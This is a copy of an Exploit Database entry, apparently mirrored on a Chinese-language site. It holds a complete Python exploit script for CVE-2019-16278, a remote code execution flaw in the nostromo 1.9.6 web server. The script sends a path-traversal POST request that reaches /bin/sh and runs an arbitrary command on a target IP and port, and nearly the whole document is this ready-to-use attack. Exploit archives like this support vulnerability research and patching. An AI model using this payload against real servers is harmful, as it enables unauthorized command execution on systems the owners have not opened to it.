nostromo 1.9.6 – Remote Code Execution

• Exploit Database
• 13 阅读

• 作者： Kr0ff
  日期： 2020-01-01
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/47837/

• # Exploit Title: nostromo 1.9.6 - Remote Code Execution
  # Date: 2019-12-31
  # Exploit Author: Kr0ff
  # Vendor Homepage:
  # Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
  # Version: 1.9.6
  # Tested on: Debian
  # CVE : CVE-2019-16278
  
  cve2019_16278.py
  
  #!/usr/bin/env python
  
  import sys
  import socket
  
  art = """
  
  _____-2019-16278
  __________________ _____\\ 
   _____\\_\||| // ||
  / /| || // /|///___/|
   / / /____/||\\\|/||__ |___|/
  | | |____|/ \ \\ || | \
  | |_____ \| \|| | __/ __ 
  |\ \|\\ |\ /| |\\/\
  | \_____\|| | \_______/ | | \____\/| 
  | | /____/|\ | | /| ||____/| 
   \|_____||| \|_____|/\|____| | | 
  |____|/|___|/
  
  
  
  """
  
  help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'
  
  def connect(soc):
  response = ""
  try:
  while True:
  connection = soc.recv(1024)
  if len(connection) == 0:
  break
  response += connection
  except:
  pass
  return response
  
  def cve(target, port, cmd):
  soc = socket.socket()
  soc.connect((target, int(port)))
  payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
  soc.send(payload)
  receive = connect(soc)
  print(receive)
  
  if __name__ == "__main__":
  
  print(art)
  
  try:
  target = sys.argv[1]
  port = sys.argv[2]
  cmd = sys.argv[3]
  
  cve(target, port, cmd)
   
  except IndexError:
  print(help_menu)